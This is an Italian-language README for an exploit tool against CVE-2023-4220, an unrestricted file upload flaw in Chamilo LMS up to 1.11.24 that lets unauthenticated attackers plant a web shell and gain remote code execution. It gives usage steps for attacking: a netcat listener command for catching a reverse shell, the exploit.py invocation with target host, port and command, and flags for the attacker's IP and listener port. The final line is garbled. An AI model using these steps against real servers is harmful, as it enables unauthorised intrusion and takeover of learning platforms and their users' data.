CVE-2023-4220-RCE
Sommario
Avviso di Starlabs
- Prodotto interessato: Chamilo <= v1.11.24
- Descrizione: Caricamento file non limitato nella funzionalità di caricamento di file grandi in /main/inc/lib/javascript/bigupload/inc/bigUpload.php in Chamilo LMS <= v1.11.24 consente ad attaccanti non autenticati di effettuare attacchi di cross-site scripting persistente e ottenere esecuzione remota di codice tramite il caricamento di una web shell.
- Punteggio CVSS: 8.1 (Alto)
Utilizzo
- Imposta un listener netcat (se vuoi una reverse shell)
sudo nc -lnvp 443
- Esegui l'exploit
python3 exploit.py -u --url <REMOTE HOST>, -p --port [REMOTE PORT] -c --comand <COMMAND>
- Flag per la reverse shell
- -lh/--localhost: IP dell'attaccante
- **-lp/--localtcat porta listener